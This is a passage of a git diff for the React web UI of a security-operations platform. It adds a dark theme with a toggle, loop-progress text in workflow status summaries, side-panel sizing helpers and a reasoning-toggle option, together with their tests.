+  const lineNumbers = useMemo(() => {
+    const totalLines = Math.max(1, value.split('\n').length);
+    return Array.from({ length: totalLines }, (_, index) => index + 1);
+  }, [value]);
+  const gutterWidth = Math.max(56, String(lineNumbers.length).length * 8 + 32);
+
+  const syncLineNumberOffset = useCallback(() => {
+    if (!lineNumberTrackRef.current) return;
+    const scrollTop = textareaRef.current?.scrollTop ?? 0;
+    lineNumberTrackRef.current.style.transform = `translateY(-${scrollTop}px)`;
+  }, []);
+
+  useEffect(() => {
+    syncLineNumberOffset();
+  }, [lineNumbers.length, syncLineNumberOffset]);
+
+  return (
+    <div className="flex h-full min-h-0 w-full flex-1 overflow-hidden bg-slate-950">
+      <label htmlFor={id} className="sr-only">{label}</label>
+      <div
+        aria-hidden="true"
+        data-testid="workflow-md-line-numbers"
+        className="h-full flex-shrink-0 overflow-hidden select-none border-r border-slate-800 bg-slate-900/80 py-5 pr-3 text-right font-mono text-sm leading-6 text-slate-500"
+        style={{ width: gutterWidth }}
+      >
+        <div ref={lineNumberTrackRef}>
+          {lineNumbers.map((lineNumber) => (
+            <div key={lineNumber} data-line-number={lineNumber} className="h-6 leading-6">
+              {lineNumber}
+            </div>
+          ))}
+        </div>
+      </div>
+      <textarea
+        ref={textareaRef}
+        id={id}
+        value={value}
+        onChange={(event) => onChange(event.target.value)}
+        onScroll={syncLineNumberOffset}
+        placeholder={placeholder}
+        wrap="off"
+        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto border-0 bg-slate-950 px-6 py-5 font-mono text-sm leading-6 text-slate-100 caret-red-300 outline-none selection:bg-red-500/30 placeholder:text-slate-500"
+        spellCheck={false}
+      />
+    </div>
+  );
+}
diff --git a/webui/src/components/common/WorkflowStatusBadge.test.tsx b/webui/src/components/common/WorkflowStatusBadge.test.tsx
new file mode 100644
index 000000000..485280d57
--- /dev/null
+++ b/webui/src/components/common/WorkflowStatusBadge.test.tsx
@@ -0,0 +1,17 @@
+import { render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+import WorkflowStatusBadge from './WorkflowStatusBadge';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (_key: string, options?: { defaultValue?: string }) => options?.defaultValue ?? '',
+  }),
+}));
+
+describe('WorkflowStatusBadge', () => {
+  it('renders running status as a healthy green badge', () => {
+    render(<WorkflowStatusBadge status="running" />);
+
+    expect(screen.getByText('running')).toHaveClass('bg-green-100', 'text-green-700');
+  });
+});
diff --git a/webui/src/components/common/WorkflowStatusBadge.tsx b/webui/src/components/common/WorkflowStatusBadge.tsx
index 7c7a24962..235e98096 100644
--- a/webui/src/components/common/WorkflowStatusBadge.tsx
+++ b/webui/src/components/common/WorkflowStatusBadge.tsx
@@ -13,7 +13,7 @@ interface StatusConfig {
 }
 
 const STATUS_STYLE_MAP: Record<string, StatusConfig> = {
-  running:    { className: 'bg-red-100 text-red-700',    dot: 'bg-red-500' },
+  running:    { className: 'bg-green-100 text-green-700', dot: 'bg-green-500' },
   cancelling: { className: 'bg-amber-100 text-amber-700', dot: 'bg-amber-500' },
   publishing: { className: 'bg-yellow-100 text-yellow-700', dot: 'bg-yellow-500' },
   success:    { className: 'bg-green-100 text-green-700',  dot: 'bg-green-500' },
diff --git a/webui/src/components/common/sidePanelSizing.ts b/webui/src/components/common/sidePanelSizing.ts
new file mode 100644
index 000000000..6266d5f40
--- /dev/null
+++ b/webui/src/components/common/sidePanelSizing.ts
@@ -0,0 +1,18 @@
+export const SIDE_PANEL_MIN_WIDTH = 240;
+export const SIDE_PANEL_INITIAL_RATIO = 0.4;
+export const SIDE_PANEL_MAX_RATIO = 0.7;
+export const DESKTOP_SIDEBAR_WIDTH = 256;
+
+function getAvailableWidth() {
+  if (typeof window === 'undefined') return 1024;
+  const sidebarWidth = window.innerWidth >= 1024 ? DESKTOP_SIDEBAR_WIDTH : 0;
+  return Math.max(SIDE_PANEL_MIN_WIDTH, window.innerWidth - sidebarWidth);
+}
+
+export function getInitialSidePanelWidth() {
+  return Math.max(SIDE_PANEL_MIN_WIDTH, Math.round(getAvailableWidth() * SIDE_PANEL_INITIAL_RATIO));
+}
+
+export function getMaxSidePanelWidth() {
+  return Math.max(SIDE_PANEL_MIN_WIDTH, Math.round(getAvailableWidth() * SIDE_PANEL_MAX_RATIO));
+}
diff --git a/webui/src/components/common/toolStageSummary.test.ts b/webui/src/components/common/toolStageSummary.test.ts
index d22033b58..cf8162711 100644
--- a/webui/src/components/common/toolStageSummary.test.ts
+++ b/webui/src/components/common/toolStageSummary.test.ts
@@ -13,6 +13,10 @@ describe('buildRunWorkflowHeaderSummary', () => {
         return `步骤：${String(options?.step ?? '')}`;
       case 'chat.tool.workflowNode':
         return `节点：${String(options?.node ?? '')}`;
+      case 'chat.tool.workflowLoopIteration':
+        return '循环';
+      case 'chat.tool.workflowLoopCurrent':
+        return '当前';
       default:
         return key;
     }
@@ -57,6 +61,31 @@ describe('buildRunWorkflowHeaderSummary', () => {
     ).toBe('keyword-search-summary 排队中');
   });
 
+  it('prefers generic loop progress over static node count', () => {
+    expect(
+      buildRunWorkflowHeaderSummary(
+        'run_workflow',
+        {
+          status: 'running',
+          metadata: {
+            workflow_name: 'batch-process',
+            phase: 'running',
+            current_node_id: 'inspect_item',
+            step_index: 30,
+            total_nodes: 5,
+            loop_progress: {
+              iteration: 30,
+              total_iterations: 500,
+              current_item: 'item-30',
+              current_inner_node_id: 'inspect_item',
+            },
+          },
+        },
+        zhT,
+      ),
+    ).toBe('batch-process 执行中 · 循环 30/500 · 当前: item-30 · 节点：inspect_item');
+  });
+
   it('falls back to concise english labels when no translator is provided', () => {
     expect(
       buildRunWorkflowHeaderSummary(
diff --git a/webui/src/components/common/toolStageSummary.ts b/webui/src/components/common/toolStageSummary.ts
index 1ad53eb2d..689056fbb 100644
--- a/webui/src/components/common/toolStageSummary.ts
+++ b/webui/src/components/common/toolStageSummary.ts
@@ -66,6 +66,7 @@ export function buildRunWorkflowHeaderSummary(
   const currentNodeRaw = metadata.current_node_id;
   const stepIndexRaw = metadata.step_index;
   const totalNodesRaw = metadata.total_nodes;
+  const loopProgress = metadata.loop_progress as Record<string, unknown> | undefined;
 
   const phase = typeof phaseRaw === 'string' && phaseRaw.trim() ? phaseRaw.trim() : 'running';
   const currentNode =
@@ -87,16 +88,44 @@ export function buildRunWorkflowHeaderSummary(
     : resolvePhaseLabel(phase);
 
   let summary = `${workflowName} ${phaseLabel}`;
-  if (stepIndex !== null && stepIndex > 0) {
+  const loopIteration =
+    typeof loopProgress?.iteration === 'number' && Number.isFinite(loopProgress.iteration)
+      ? loopProgress.iteration
+      : null;
+  const loopTotal =
+    typeof loopProgress?.total_iterations === 'number' && Number.isFinite(loopProgress.total_iterations)
+      ? loopProgress.total_iterations
+      : null;
+  const loopItem =
+    typeof loopProgress?.current_item === 'string' && loopProgress.current_item.trim()
+      ? loopProgress.current_item.trim()
+      : '';
+  const loopInnerNode =
+    typeof loopProgress?.current_inner_node_id === 'string' && loopProgress.current_inner_node_id.trim()
+      ? loopProgress.current_inner_node_id.trim()
+      : '';
+
+  if (loopIteration !== null && loopIteration > 0) {
+    const loopLabel = translateOrFallback('chat.tool.workflowLoopIteration', 'Loop', t);
+    const progressLabel = loopTotal !== null && loopTotal > 0
+      ? `${loopIteration}/${loopTotal}`
+      : `${loopIteration}`;
+    summary += ` · ${loopLabel} ${progressLabel}`;
+    if (loopItem) {
+      const currentLabel = translateOrFallback('chat.tool.workflowLoopCurrent', 'Current', t);
+      summary += ` · ${currentLabel}: ${loopItem}`;
+    }
+  } else if (stepIndex !== null && stepIndex > 0) {
     const stepLabel = totalNodes !== null ? `${stepIndex}/${totalNodes}` : `${stepIndex}`;
     summary += ` · ${stepLabel}`;
   }
-  if (currentNode) {
+  const nodeForDisplay = loopInnerNode || currentNode;
+  if (nodeForDisplay) {
     summary += ` · ${translateOrFallback(
       'chat.tool.workflowNode',
-      `node:${currentNode}`,
+      `node:${nodeForDisplay}`,
       t,
-      { node: currentNode },
+      { node: nodeForDisplay },
     )}`;
   }
   return summary;
diff --git a/webui/src/components/common/useRexComposerControls.tsx b/webui/src/components/common/useRexComposerControls.tsx
new file mode 100644
index 000000000..2a8c602d0
--- /dev/null
+++ b/webui/src/components/common/useRexComposerControls.tsx
@@ -0,0 +1,57 @@
+import { useMemo } from 'react';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from './ChatPromptSelectors';
+import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
+
+const REX_AGENT_NAME = 'rex';
+const REX_AGENT_NAMES = [REX_AGENT_NAME];
+
+export function useRexComposerControls() {
+  const defaultSupportsVision = useDefaultModelVision();
+  const { agents } = useChatAgentOptions({
+    allowedAgentNames: REX_AGENT_NAMES,
+  });
+  const {
+    groupedOptions,
+    loading,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+
+  return useMemo(() => ({
+    rexAgentName: REX_AGENT_NAME,
+    rexMentionAgents: agents,
+    rexModel: selectedPromptModel,
+    rexSupportsVision: selectedModelOption?.supportsVision ?? defaultSupportsVision,
+    rexContextWindowTokens: selectedModelOption?.contextWindowTokens ?? null,
+    rexComposerTextareaMinHeight: 48,
+    rexComposerTextareaMaxHeight: 120,
+    rexToolbarSlot: (
+      <ChatAgentDisplay
+        agents={agents}
+        selectedAgent={REX_AGENT_NAME}
+      />
+    ),
+    rexCenterToolbarSlot: (
+      <ChatModelPicker
+        groupedOptions={groupedOptions}
+        loading={loading}
+        selectedModelOption={selectedModelOption}
+        onSelectModel={(option) => setSelectedModelKey(option.key)}
+      />
+    ),
+  }), [
+    agents,
+    defaultSupportsVision,
+    groupedOptions,
+    loading,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  ]);
+}
diff --git a/webui/src/components/layout/AuthLayout.tsx b/webui/src/components/layout/AuthLayout.tsx
index 890edcc9e..56d576beb 100644
--- a/webui/src/components/layout/AuthLayout.tsx
+++ b/webui/src/components/layout/AuthLayout.tsx
@@ -1,6 +1,7 @@
 import type { ReactNode } from 'react';
 import { Globe } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
+import ThemeToggle from '@/components/common/ThemeToggle';
 
 const LANGUAGES = [
   { code: 'en-US', label: 'EN' },
@@ -16,14 +17,14 @@ export default function AuthLayout({ children }: AuthLayoutProps) {
   const currentLang = i18n.language;
 
   return (
-    <div className="min-h-screen bg-gray-50 flex flex-col">
+    <div className="min-h-screen bg-gray-50 flex flex-col dark:bg-[#252c35]">
       <div className="flex justify-end px-4 pt-4">
         <div
-          className="inline-flex items-center gap-1 rounded-full border border-gray-200 bg-white px-2 py-1 shadow-sm"
+          className="inline-flex items-center gap-1 rounded-full border border-gray-200 bg-white px-2 py-1 shadow-sm dark:border-[#4a5563] dark:bg-[#303842]"
           role="group"
           aria-label={t('switchLanguage')}
         >
-          <Globe className="mx-1 h-3.5 w-3.5 text-gray-400" aria-hidden />
+          <Globe className="mx-1 h-3.5 w-3.5 text-gray-400 dark:text-[#9aa7b4]" aria-hidden />
           {LANGUAGES.map(({ code, label }) => (
             <button
               key={code}
@@ -31,13 +32,15 @@ export default function AuthLayout({ children }: AuthLayoutProps) {
               onClick={() => i18n.changeLanguage(code)}
               className={`px-2.5 py-1 text-xs font-medium rounded-full transition-colors ${
                 currentLang === code
-                  ? 'bg-slate-900 text-white'
-                  : 'text-gray-500 hover:bg-gray-100 hover:text-gray-700'
+                  ? 'bg-slate-900 text-white dark:bg-[#46515e] dark:text-white'
+                  : 'text-gray-500 hover:bg-gray-100 hover:text-gray-700 dark:text-[#b8c2cc] dark:hover:bg-[#3a434e] dark:hover:text-white'
               }`}
             >
               {label}
             </button>
           ))}
+          <div className="ml-1 h-5 w-px bg-gray-200 dark:bg-[#4a5563]" />
+          <ThemeToggle />
         </div>
       </div>
       <div className="flex-1 flex items-center justify-center p-6">
diff --git a/webui/src/components/layout/Layout.test.tsx b/webui/src/components/layout/Layout.test.tsx
index 883ac1435..297e8858f 100644
--- a/webui/src/components/layout/Layout.test.tsx
+++ b/webui/src/components/layout/Layout.test.tsx
@@ -195,7 +195,11 @@ function renderHomeWithLayout() {
 
 async function flushEffects() {
   await act(async () => {
-    await vi.advanceTimersByTimeAsync(0);
+    if (vi.isFakeTimers()) {
+      await vi.advanceTimersByTimeAsync(0);
+      return;
+    }
+    await Promise.resolve();
   });
 }
 
diff --git a/webui/src/components/layout/Layout.tsx b/webui/src/components/layout/Layout.tsx
index 5ffad5b9e..172ab8046 100644
--- a/webui/src/components/layout/Layout.tsx
+++ b/webui/src/components/layout/Layout.tsx
@@ -25,6 +25,7 @@ import {
 import { useState, useEffect, useLayoutEffect, useCallback, useMemo, useRef, lazy, Suspense } from 'react';
 import { useTranslation } from 'react-i18next';
 import LanguageSwitcher from '@/components/common/LanguageSwitcher';
+import ThemeToggle from '@/components/common/ThemeToggle';
 // Modals are only rendered after the user clicks/triggers them; pulling them
 // into the eager Layout chunk costs ~1.7k LOC + i18n keys + lucide icons that
 // the home page never needs. To keep the lazy split effective, we don't
@@ -478,7 +479,7 @@ export default function Layout() {
     : productName;
 
   return (
-    <div className="min-h-screen bg-gray-50">
+    <div className="min-h-screen bg-gray-50 text-gray-900 dark:bg-zinc-950 dark:text-zinc-100">
       {/* Modals render lazily — fallback={null} keeps the chunk download
           invisible to the user (they're already triggering an async UI). */}
       <Suspense fallback={null}>
@@ -509,14 +510,14 @@ export default function Layout() {
 
       {sidebarOpen && (
         <div
-          className="fixed inset-0 bg-gray-600 bg-opacity-75 z-40 lg:hidden"
+          className="fixed inset-0 bg-gray-600 bg-opacity-75 z-40 lg:hidden dark:bg-black dark:bg-opacity-75"
           onClick={() => setSidebarOpen(false)}
         />
       )}
 
       <aside
         className={`
-          fixed inset-y-0 left-0 z-50 bg-zinc-100 border-r border-zinc-200
+          fixed inset-y-0 left-0 z-50 bg-zinc-100 border-r border-zinc-200 dark:bg-zinc-950 dark:border-zinc-800
           transition-all duration-300 ease-in-out
           lg:translate-x-0
           ${sidebarOpen ? 'translate-x-0' : '-translate-x-full'}
@@ -525,20 +526,20 @@ export default function Layout() {
       >
         <div className="flex flex-col h-full overflow-hidden">
           {/* Logo */}
-          <div className={`flex items-center h-16 border-b border-zinc-200 flex-shrink-0 ${collapsed ? 'justify-center px-2' : 'pl-6 pr-4'}`}>
+          <div className={`flex items-center h-16 border-b border-zinc-200 flex-shrink-0 dark:border-zinc-800 ${collapsed ? 'justify-center px-2' : 'pl-6 pr-4'}`}>
             {collapsed ? (
               <div
-                className="w-8 h-8 rounded-lg border border-zinc-200 bg-white flex items-center justify-center flex-shrink-0 shadow-sm"
+                className="w-8 h-8 rounded-lg border border-zinc-200 bg-white flex items-center justify-center flex-shrink-0 shadow-sm dark:border-zinc-800 dark:bg-zinc-900"
                 title={productName}
               >
-                <Sparkles className="w-4 h-4 text-zinc-500" />
+                <Sparkles className="w-4 h-4 text-zinc-500 dark:text-zinc-300" />
               </div>
             ) : (
               <>
-                <span className="flex-1 min-w-0 text-xl font-bold text-zinc-900 whitespace-nowrap">{productName}</span>
+                <span className="flex-1 min-w-0 text-xl font-bold text-zinc-900 whitespace-nowrap dark:text-zinc-50">{productName}</span>
                 <button
                   onClick={() => setSidebarOpen(false)}
-                  className="lg:hidden p-1 text-zinc-400 hover:text-zinc-600 rounded flex-shrink-0"
+                  className="lg:hidden p-1 text-zinc-400 hover:text-zinc-600 rounded flex-shrink-0 dark:hover:text-zinc-100"
                 >
                   <X className="w-5 h-5" />
                 </button>
@@ -551,11 +552,11 @@ export default function Layout() {
             {navigation.map((section) => (
               <div key={section.name} className="mb-6">
                 {!collapsed && section.name && (
-                  <h3 className="px-3 mb-2 text-xs font-semibold text-zinc-400 uppercase tracking-wider whitespace-nowrap">
+                  <h3 className="px-3 mb-2 text-xs font-semibold text-zinc-400 uppercase tracking-wider whitespace-nowrap dark:text-zinc-500">
                     {section.name}
                   </h3>
                 )}
-                {collapsed && <div className="mb-1 border-t border-zinc-200 first:border-none" />}
+                {collapsed && <div className="mb-1 border-t border-zinc-200 first:border-none dark:border-zinc-800" />}
                 <div className="space-y-0.5">
                   {section.items.map((item) => {
                     const isActive = location.pathname === item.href
@@ -570,13 +571,13 @@ export default function Layout() {
                           flex items-center rounded-lg transition-all duration-150
                           ${collapsed ? 'justify-center p-2.5' : 'px-3 py-2 text-sm font-medium'}
                           ${isActive
-                            ? 'bg-white text-zinc-900 shadow-sm'
-                            : 'text-zinc-600 hover:bg-white/60 hover:text-zinc-900'
+                            ? 'bg-white text-zinc-900 shadow-sm dark:bg-zinc-800 dark:text-zinc-50'
+                            : 'text-zinc-600 hover:bg-white/60 hover:text-zinc-900 dark:text-zinc-400 dark:hover:bg-zinc-900 dark:hover:text-zinc-50'
                           }
                         `}
                       >
                         <item.icon
-                          className={`flex-shrink-0 w-5 h-5 ${collapsed ? '' : 'mr-3'} ${isActive ? 'text-zinc-700' : 'text-zinc-400'}`}
+                          className={`flex-shrink-0 w-5 h-5 ${collapsed ? '' : 'mr-3'} ${isActive ? 'text-zinc-700 dark:text-zinc-100' : 'text-zinc-400 dark:text-zinc-500'}`}
                         />
                         {!collapsed && (
                           <span className="truncate">{item.name}</span>
@@ -590,41 +591,44 @@ export default function Layout() {
           </nav>
 
           {/* Bottom: Language switcher + version */}
-          <div className={`border-t border-zinc-200 flex-shrink-0 ${collapsed ? 'p-2 flex flex-col items-center gap-2' : 'p-4'}`}>
-            <LanguageSwitcher collapsed={collapsed} />
+          <div className={`border-t border-zinc-200 flex-shrink-0 dark:border-zinc-800 ${collapsed ? 'p-2 flex flex-col items-center gap-2' : 'p-4'}`}>
+            <div className={`flex ${collapsed ? 'flex-col items-center gap-2' : 'items-center gap-2'}`}>
+              <LanguageSwitcher collapsed={collapsed} />
+              <ThemeToggle collapsed={collapsed} />
+            </div>
             {!collapsed && (
               <>
                 {hasUpdate && canManageUpdates ? (
                   <button
                     onClick={() => setShowUpdate(true)}
-                    className="mt-3 w-full rounded-xl border border-amber-200 bg-gradient-to-r from-amber-50 via-orange-50 to-rose-50 px-3 py-2 text-left shadow-sm transition-all hover:-translate-y-0.5 hover:shadow-md"
+                    className="mt-3 w-full rounded-xl border border-amber-200 bg-gradient-to-r from-amber-50 via-orange-50 to-rose-50 px-3 py-2 text-left shadow-sm transition-all hover:-translate-y-0.5 hover:shadow-md dark:border-amber-500/30 dark:from-amber-950/60 dark:via-orange-950/50 dark:to-rose-950/50"
                   >
                     <div className="flex items-center gap-2 text-sm">
-                      <span className="min-w-0 flex-1 truncate font-semibold text-amber-900">
+                      <span className="min-w-0 flex-1 truncate font-semibold text-amber-900 dark:text-amber-100">
                         {t('newVersion')} {formatUpdateVersion(latestVersion) || ''}
                       </span>
                       <span className="inline-flex flex-shrink-0 items-center rounded-full bg-amber-500 px-2 py-0.5 text-xs font-semibold text-white shadow-sm">
                         {t('updateNow')}
                       </span>
                     </div>
-                    <div className="mt-1 text-xs text-amber-700">
+                    <div className="mt-1 text-xs text-amber-700 dark:text-amber-300">
                       {currentVersionLabel}
                     </div>
-                    <div className="mt-0.5 text-xs font-medium text-amber-900">
+                    <div className="mt-0.5 text-xs font-medium text-amber-900 dark:text-amber-100">
                       AI Native SecOps Platform
                     </div>
                   </button>
                 ) : (
                   <button
                     onClick={() => setShowUpdate(true)}
-                    className="w-full text-left mt-3 group rounded-lg px-1 py-1 hover:bg-white/60 transition-colors"
+                    className="w-full text-left mt-3 group rounded-lg px-1 py-1 hover:bg-white/60 transition-colors dark:hover:bg-zinc-900"
                   >
                     <div className="flex items-center gap-1.5">
-                      <span className="text-xs font-medium text-zinc-500 group-hover:text-zinc-800 transition-colors">
+                      <span className="text-xs font-medium text-zinc-500 group-hover:text-zinc-800 transition-colors dark:text-zinc-400 dark:group-hover:text-zinc-100">
                         {productName} {displayVersion || '...'}
                       </span>
                     </div>
-                    <div className="mt-0.5 text-xs text-zinc-400">AI Native SecOps Platform</div>
+                    <div className="mt-0.5 text-xs text-zinc-400 dark:text-zinc-500">AI Native SecOps Platform</div>
                   </button>
                 )}
               </>
@@ -635,8 +639,8 @@ export default function Layout() {
                 title={hasUpdate && canManageUpdates ? t('hasNewVersion', { version: formatUpdateVersion(latestVersion) || '' }) : t('versionInfo')}
                 className={`relative rounded-xl p-2 transition-colors ${
                   hasUpdate && canManageUpdates
-                    ? 'bg-amber-50 text-amber-600 hover:bg-amber-100'
-                    : 'text-zinc-400 hover:text-zinc-600 hover:bg-white/60'
+                    ? 'bg-amber-50 text-amber-600 hover:bg-amber-100 dark:bg-amber-950/50 dark:text-amber-300 dark:hover:bg-amber-900/60'
+                    : 'text-zinc-400 hover:text-zinc-600 hover:bg-white/60 dark:hover:bg-zinc-900 dark:hover:text-zinc-100'
                 }`}
               >
                 {hasUpdate && canManageUpdates ? <ArrowUpCircle className="w-4 h-4" /> : <Sparkles className="w-4 h-4" />}
@@ -659,6 +663,7 @@ export default function Layout() {
             w-3 h-20 items-center justify-center
             bg-zinc-200 hover:bg-zinc-300 border border-r-0 border-zinc-200 rounded-l-lg
             text-zinc-400 hover:text-zinc-600
+            dark:bg-zinc-900 dark:hover:bg-zinc-800 dark:border-zinc-800 dark:text-zinc-500 dark:hover:text-zinc-100
             transition-all duration-200
           "
           title={collapsed ? t('expandNav') : t('collapseNav')}
@@ -671,7 +676,7 @@ export default function Layout() {
       <div className={`lg:hidden fixed top-0 left-0 z-30 flex items-center h-16 px-4 ${sidebarOpen ? 'hidden' : ''}`}>
         <button
           onClick={() => setSidebarOpen(true)}
-          className="p-2 text-gray-500 hover:text-gray-700 bg-white rounded-lg shadow-sm border border-gray-200"
+          className="p-2 text-gray-500 hover:text-gray-700 bg-white rounded-lg shadow-sm border border-gray-200 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:hover:text-zinc-50"
         >
           <Menu className="w-5 h-5" />
         </button>
@@ -681,7 +686,7 @@ export default function Layout() {
       <div
         className={`flex flex-col h-screen transition-all duration-300 ${collapsed ? 'lg:pl-16' : 'lg:pl-52'}`}
       >
-        <main className="flex-1 overflow-hidden bg-gray-50">
+        <main className="flex-1 overflow-hidden bg-gray-50 dark:bg-zinc-950">
           {isFullScreenPage ? (
             <Outlet />
           ) : (
diff --git a/webui/src/contexts/ThemeContext.test.tsx b/webui/src/contexts/ThemeContext.test.tsx
new file mode 100644
index 000000000..9a6144719
--- /dev/null
+++ b/webui/src/contexts/ThemeContext.test.tsx
@@ -0,0 +1,100 @@
+import React, { useContext } from 'react';
+import { act, render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { ThemeContext, ThemeProvider } from './ThemeContext';
+
+function ThemeProbe() {
+  const { theme, toggleTheme, setTheme } = useContext(ThemeContext);
+
+  return (
+    <div>
+      <span data-testid="theme-value">{theme}</span>
+      <button type="button" onClick={toggleTheme}>
+        toggle
+      </button>
+      <button type="button" onClick={() => setTheme('dark')}>
+        set dark
+      </button>
+    </div>
+  );
+}
+
+function mockPreferredScheme(matchesDark: boolean) {
+  Object.defineProperty(window, 'matchMedia', {
+    configurable: true,
+    writable: true,
+    value: vi.fn().mockImplementation((query: string) => ({
+      matches: query === '(prefers-color-scheme: dark)' ? matchesDark : false,
+      media: query,
+      onchange: null,
+      addEventListener: vi.fn(),
+      removeEventListener: vi.fn(),
+      addListener: vi.fn(),
+      removeListener: vi.fn(),
+      dispatchEvent: vi.fn(),
+    })),
+  });
+}
+
+describe('ThemeProvider', () => {
+  beforeEach(() => {
+    localStorage.clear();
+    document.documentElement.classList.remove('dark');
+    document.documentElement.style.colorScheme = '';
+    mockPreferredScheme(false);
+  });
+
+  it('uses system dark preference when no stored theme exists', async () => {
+    mockPreferredScheme(true);
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('dark');
+    expect(document.documentElement).toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('dark');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('dark'));
+  });
+
+  it('prefers the stored theme over system preference', async () => {
+    localStorage.setItem('flocks_theme', 'light');
+    mockPreferredScheme(true);
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('light');
+    expect(document.documentElement).not.toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('light');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('light'));
+  });
+
+  it('toggles and persists the dark class on the document root', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ThemeProvider>
+        <ThemeProbe />
+      </ThemeProvider>,
+    );
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('light');
+    expect(document.documentElement).not.toHaveClass('dark');
+
+    await act(async () => {
+      await user.click(screen.getByRole('button', { name: 'toggle' }));
+    });
+
+    expect(screen.getByTestId('theme-value')).toHaveTextContent('dark');
+    expect(document.documentElement).toHaveClass('dark');
+    expect(document.documentElement.style.colorScheme).toBe('dark');
+    await waitFor(() => expect(localStorage.getItem('flocks_theme')).toBe('dark'));
+  });
+});
diff --git a/webui/src/contexts/ThemeContext.tsx b/webui/src/contexts/ThemeContext.tsx
new file mode 100644
index 000000000..8968f28ad
--- /dev/null
+++ b/webui/src/contexts/ThemeContext.tsx
@@ -0,0 +1,63 @@
+import { createContext, useCallback, useEffect, useLayoutEffect, useMemo, useState, type ReactNode } from 'react';
+
+type Theme = 'light' | 'dark';
+
+interface ThemeContextValue {
+  theme: Theme;
+  toggleTheme: () => void;
+  setTheme: (theme: Theme) => void;
+}
+
+const THEME_STORAGE_KEY = 'flocks_theme';
+
+const ThemeContext = createContext<ThemeContextValue>({
+  theme: 'light',
+  toggleTheme: () => undefined,
+  setTheme: () => undefined,
+});
+
+function getInitialTheme(): Theme {
+  if (typeof window === 'undefined') return 'light';
+
+  const storage = window.localStorage;
+  const stored = typeof storage?.getItem === 'function' ? storage.getItem(THEME_STORAGE_KEY) : null;
+  if (stored === 'light' || stored === 'dark') return stored;
+
+  if (typeof window.matchMedia !== 'function') return 'light';
+
+  return window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
+}
+
+function applyTheme(theme: Theme) {
+  const root = document.documentElement;
+  root.classList.toggle('dark', theme === 'dark');
+  root.style.colorScheme = theme;
+}
+
+export function ThemeProvider({ children }: { children: ReactNode }) {
+  const [theme, setThemeState] = useState<Theme>(getInitialTheme);
+
+  useLayoutEffect(() => {
+    applyTheme(theme);
+  }, [theme]);
+
+  useEffect(() => {
+    if (typeof window.localStorage?.setItem === 'function') {
+      window.localStorage.setItem(THEME_STORAGE_KEY, theme);
+    }
+  }, [theme]);
+
+  const setTheme = useCallback((nextTheme: Theme) => {
+    setThemeState(nextTheme);
+  }, []);
+
+  const toggleTheme = useCallback(() => {
+    setThemeState((current) => (current === 'dark' ? 'light' : 'dark'));
+  }, []);
+
+  const value = useMemo(() => ({ theme, toggleTheme, setTheme }), [setTheme, theme, toggleTheme]);
+
+  return <ThemeContext.Provider value={value}>{children}</ThemeContext.Provider>;
+}
+
+export { ThemeContext };
diff --git a/webui/src/hooks/useReasoningToggle.test.tsx b/webui/src/hooks/useReasoningToggle.test.tsx
new file mode 100644
index 000000000..42c7a13ef
--- /dev/null
+++ b/webui/src/hooks/useReasoningToggle.test.tsx
@@ -0,0 +1,45 @@
+import { act, renderHook } from '@testing-library/react';
+import { describe, expect, it } from 'vitest';
+
+import { useReasoningToggle } from './useReasoningToggle';
+
+describe('useReasoningToggle', () => {
+  it('keeps active reasoning expanded by default for normal chat', () => {
+    const { result } = renderHook(() => useReasoningToggle([
+      { id: 'reason-1', type: 'reasoning', text: 'thinking' },
+    ]));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+
+  it('can default-collapse active reasoning for embedded workflow panels and expand on click', () => {
+    const { result } = renderHook(() => useReasoningToggle(
+      [{ id: 'reason-1', type: 'reasoning', text: 'thinking' }],
+      undefined,
+      { expandWhileActive: false },
+    ));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(false);
+
+    act(() => {
+      result.current.togglePart('reason-1');
+    });
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+
+  it('keeps completed reasoning collapsed by default but expandable', () => {
+    const { result } = renderHook(() => useReasoningToggle([
+      { id: 'reason-1', type: 'reasoning', text: 'thinking' },
+      { id: 'text-1', type: 'text', text: 'answer' },
+    ]));
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(false);
+
+    act(() => {
+      result.current.togglePart('reason-1');
+    });
+
+    expect(result.current.getPartExpanded('reason-1')).toBe(true);
+  });
+});
diff --git a/webui/src/hooks/useReasoningToggle.ts b/webui/src/hooks/useReasoningToggle.ts
index 21e24ab34..b01b48f6e 100644
--- a/webui/src/hooks/useReasoningToggle.ts
+++ b/webui/src/hooks/useReasoningToggle.ts
@@ -11,10 +11,20 @@ import { useState, useMemo } from 'react';
  * - Once reasoning is done (text or tool part exists, or message finished) → collapsed by default
  * - User can manually toggle (collapse/expand) each reasoning block independently
  */
+interface ReasoningToggleOptions {
+  /** Expand active reasoning before the assistant has produced text/tool output. */
+  expandWhileActive?: boolean;
+  /** Default expanded state after reasoning is complete. */
+  defaultExpanded?: boolean;
+}
+
 export function useReasoningToggle(
   parts: any[],
   messageFinish?: any,
+  options: ReasoningToggleOptions = {},
 ) {
